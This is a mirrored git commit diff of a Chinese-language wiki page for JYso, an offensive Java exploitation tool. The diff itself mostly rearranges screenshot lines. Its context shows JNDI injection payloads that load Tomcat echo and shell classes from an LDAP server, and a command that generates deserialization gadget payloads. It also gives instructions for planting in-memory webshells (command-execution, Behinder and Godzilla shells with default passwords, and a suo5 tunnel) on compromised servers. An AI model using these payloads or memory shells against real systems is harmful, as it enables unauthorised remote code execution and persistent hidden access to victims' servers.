mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-25 16:21:52 +08:00
Updated JYso‐CN (markdown)
+6
-4
@@ -195,10 +195,6 @@ ${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho}
|
||||
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/LWNoIENvb2tpZXNz}
|
||||
```
|
||||
|
||||
效果图:
|
||||
|
||||

|
||||
|
||||
+ ysoserial
|
||||
```
|
||||
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho"
|
||||
@@ -295,10 +291,16 @@ java -jar JYso-[version].jar -y -g [Gadget] -p "[EX-MemShellClass]"
|
||||
|
||||
1. 如果是 **CMD** 内存马,程序会从 `X-Token-Data` 中读取待执行的命令,并将执行结果进行回显,这个头部可以通过 `-ch "testecho"` 来指定。
|
||||
|
||||

|
||||
|
||||
2. 如果是 **冰蝎** Shell 内存马,可使用冰蝎客户端进行连接管理,密码 `p@ssw0rd`, 可以通过 `-pw "1qaz@WSX"` 来指定。
|
||||
|
||||

|
||||
|
||||
3. 如果是 **哥斯拉** shell 内存马,可使用哥斯拉客户端进行连接管理,pass 值设为 `p@ssw0rd`,key 设为 `key`,哥斯拉内存马同时支持了 RAW 和 Base64,可以通过 `-pw "1qaz@WSX" -gzk "evilkey"` 来指定。
|
||||
|
||||

|
||||
|
||||
4. 如果是 **suo5** 内存马,则会直接创建一个 suo5 隧道,可以直接由 suo5 客户端进行连接,suo5 目前对支持了对自定义 Header 头部进行鉴权,生成时可以通过参数 `-hk "User-Agent" -hv "aaaawww"` 指定,如下可正常连接:
|
||||
|
||||
在配置中进行配置。
|
||||
|
||||
Reference in New Issue
Block a user